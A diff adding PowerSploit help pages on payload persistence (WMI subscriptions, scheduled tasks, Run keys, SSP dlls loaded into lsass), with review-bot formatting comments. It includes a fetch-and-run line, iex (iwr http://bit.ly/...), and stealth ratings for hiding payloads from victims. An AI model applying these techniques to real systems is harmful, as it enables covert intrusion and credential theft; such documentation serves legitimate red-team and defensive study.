Diffstat (limited to 'docs/Persistence')

-rwxr-xr-x  docs/Persistence/Add-Persistence.md               | 227
-rwxr-xr-x  docs/Persistence/Get-SecurityPackage.md           |  37
-rwxr-xr-x  docs/Persistence/Install-SSP.md                   |  60
-rwxr-xr-x  docs/Persistence/New-ElevatedPersistenceOption.md | 235
-rwxr-xr-x  docs/Persistence/New-UserPersistenceOption.md     | 179

5 files changed, 738 insertions, 0 deletions
diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md new file mode 100755 index 0000000..bdd14fb --- /dev/null +++ b/docs/Persistence/Add-Persistence.md @@ -0,0 +1,227 @@ +# Add-Persistence
+
+## SYNOPSIS
+Add persistence capabilities to a script.
+
+PowerSploit Function: Add-Persistence
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScriptBlock
+```
+Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+### FilePath
+```
+Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+## DESCRIPTION
+Add-Persistence will add persistence capabilities to any script or scriptblock.
+This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+
+Description
+-----------
+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+```
+
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+
+Description
+-----------
+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.
+The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
+
+## PARAMETERS
+
+### -ScriptBlock
+Specifies a scriptblock containing your payload.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -FilePath
+Specifies the path to your payload.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases: Path
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ElevatedPersistenceOption
+Specifies the trigger for the persistent payload if the target is running elevated.
+You must run New-ElevatedPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserPersistenceOption
+Specifies the trigger for the persistent payload if the target is not running elevated.
+You must run New-UserPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistenceScriptName
+Specifies the name of the function that will wrap the original payload.
+The default value is 'Update-Windows'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Update-Windows
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistentScriptFilePath
+Specifies the path where you would like to output the persistence script.
+By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$PWD\Persistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RemovalScriptFilePath
+Specifies the path where you would like to output a script that will remove the persistent payload.
+By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$PWD\RemovePersistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DoNotPersistImmediately
+Output only the wrapper function for the original payload.
+By default, Add-Persistence will output a script that will automatically attempt to persist (e.g.
+it will end with 'Update-Windows -Persist').
+If you are in a position where you are running in memory but want to persist at a later time, use this option.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PassThru
+Outputs the contents of the persistent script to the pipeline.
+This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+Add-Persistence cannot receive any input from the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.ScriptBlock
+
+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
+
+## NOTES
+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
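Review bot: both EXAMPLE fences in Add-Persistence.md close after their first line, so the remaining commands of each example (`$UserOptions = New-UserPersistenceOption -Registry -AtLogon` and the `Add-Persistence -FilePath .\EvilPayload.ps1 ...` call in EXAMPLE 1; the two option assignments and the `Add-Persistence -ScriptBlock $RickRoll ... | Out-EncodedCommand | Out-File` pipeline in EXAMPLE 2) render as body text instead of code. Move the closing fence below the last command of each example, and turn the "Description / -----------" pair into a plain paragraph or a heading, since a dashed underline is not a separator in this Markdown. Two copy-paste errors in the parameter text need fixing: under `-PersistentScriptFilePath` the sentence "Add-Persistence will write the removal script to 'Persistence.ps1'" should say "the persistence script", and the INPUTS section states that Add-Persistence cannot receive any input from the pipeline while the `-ScriptBlock` table says `Accept pipeline input: True (ByValue)`; one of the two is wrong. Minor: "as well a script" in DESCRIPTION should be "as well as a script", and it would help if DESCRIPTION said that the default output is the two files on disk (the `$PWD\Persistence.ps1` and `$PWD\RemovePersistence.ps1` defaults) and that the pipeline receives the scriptblock only with `-PassThru`, as OUTPUTS already states.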
diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md new file mode 100755 index 0000000..2a0cdef --- /dev/null +++ b/docs/Persistence/Get-SecurityPackage.md @@ -0,0 +1,37 @@ +# Get-SecurityPackage
+
+## SYNOPSIS
+Enumerates all loaded security packages (SSPs).
+
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-SecurityPackage
+```
+
+## DESCRIPTION
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
+It also parses the returned SecPkgInfo struct array.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-SecurityPackage
+```
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
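Review bot: the PARAMETERS, INPUTS, OUTPUTS and NOTES sections of Get-SecurityPackage.md are empty headings. PARAMETERS can be dropped or marked "None" since the syntax block takes no arguments, but OUTPUTS should describe the objects the function emits: DESCRIPTION says it "parses the returned SecPkgInfo struct array", so the reader needs to know which fields of `SecPkgInfo` end up on each output object. EXAMPLE 1 also has no description line, unlike the examples in Add-Persistence.md, and the header block lacks the `PowerSploit Function: Get-SecurityPackage` line that the other three function pages in this set carry.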
diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md new file mode 100755 index 0000000..99193c0 --- /dev/null +++ b/docs/Persistence/Install-SSP.md @@ -0,0 +1,60 @@ +# Install-SSP
+
+## SYNOPSIS
+Installs a security support provider (SSP) dll.
+
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Install-SSP [[-Path] <String>]
+```
+
+## DESCRIPTION
+Install-SSP installs an SSP dll.
+Installation involves copying the dll to
+%windir%\System32 and adding the name of the dll to
+HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-SSP -Path .\mimilib.dll
+```
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+The SSP dll must match the OS architecture.
+i.e.
+You must have a 64-bit SSP dll
+if you are running a 64-bit OS.
+In order for the SSP dll to be loaded properly
+into lsass, the dll must export SpLsaModeInitialize.
+
+## RELATED LINKS
+
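Review bot: `{{Fill Path Description}}` under `### -Path` in Install-SSP.md is an unfilled template placeholder and should be replaced with the real description, i.e. the path to the SSP dll that DESCRIPTION says is copied to `%windir%\System32` and registered under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages`. Because `-Path` is listed as `Required: False` with `Default value: None`, the text should also state what the function does when it is omitted. The NOTES paragraph is wrapped mid-sentence ("i.e." on its own line, then "You must have a 64-bit SSP dll" / "if you are running a 64-bit OS."); join it into two sentences, and consider repeating the `SpLsaModeInitialize` export requirement in the `-Path` description, since that is the constraint a caller checks before passing a dll. INPUTS and OUTPUTS are empty and should at least say "None".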
diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md new file mode 100755 index 0000000..efe215d --- /dev/null +++ b/docs/Persistence/New-ElevatedPersistenceOption.md @@ -0,0 +1,235 @@ +# New-ElevatedPersistenceOption
+
+## SYNOPSIS
+Configure elevated persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-ElevatedPersistenceOption
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### PermanentWMIAtStartup
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]
+```
+
+### PermanentWMIDaily
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>
+```
+
+### ScheduledTaskOnIdle
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskAtLogon
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]
+```
+
+### ScheduledTaskHourly
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-ElevatedPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -PermanentWMI
+Persist via a permanent WMI event subscription.
+This option will be the most difficult to detect and remove.
+
+Detection Difficulty: Difficult
+Removal Difficulty: Difficult
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty: Moderate
+Removal Difficulty: Moderate
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty: Easy
+Removal Difficulty: Easy
+User Detectable?
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskAtLogon, Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtStartup
+Starts the payload within 240 and 325 seconds of computer startup.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
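Review bot: EXAMPLE 2 in New-ElevatedPersistenceOption.md, `$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup`, matches no parameter set documented above it: the Registry syntax is `New-ElevatedPersistenceOption [-Registry] [-AtLogon]` and `-AtStartup` appears only in the `PermanentWMIAtStartup` set, so the example as written would fail parameter-set resolution. Change it to `-Registry -AtLogon`, or add a Registry/AtStartup set to SYNTAX if the function actually supports one. Also "persitence" in DESCRIPTION should be "persistence", and the "User Detectable?" / "No" (or "Yes") pair is split across two lines in each of the `-PermanentWMI`, `-ScheduledTask` and `-Registry` blocks; keep it on one line like the Detection Difficulty and Removal Difficulty lines so the three ratings render consistently. "in order of stealth" would be clearer as "from most to least stealthy", which is the ordering the per-parameter ratings give.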
diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md new file mode 100755 index 0000000..c7c020f --- /dev/null +++ b/docs/Persistence/New-UserPersistenceOption.md @@ -0,0 +1,179 @@ +# New-UserPersistenceOption
+
+## SYNOPSIS
+Configure user-level persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-UserPersistenceOption
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScheduledTaskOnIdle
+```
+New-UserPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskHourly
+```
+New-UserPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-UserPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-UserPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: scheduled task, registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty: Moderate
+Removal Difficulty: Moderate
+User Detectable?
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty: Easy
+Removal Difficulty: Easy
+User Detectable?
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: ScheduledTaskDaily
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases:
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
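Review bot: the DESCRIPTION of New-UserPersistenceOption.md says the function "allows for the configuration of elevated persistence options", copied from New-ElevatedPersistenceOption.md; the SYNOPSIS calls this the user-level variant, so it should read "user-level persistence options". Same "persitence" typo and the same split "User Detectable?" / "No" lines as in the elevated file. The SYNTAX block has no ScheduledTask/AtLogon set and `-AtLogon` is listed only for the `Registry` set, which is internally consistent, but a sentence in DESCRIPTION saying that logon-triggered user persistence is registry-only here would stop readers from expecting the elevated function's `ScheduledTaskAtLogon` option. INPUTS, OUTPUTS and NOTES are empty headings and should say "None" or be removed.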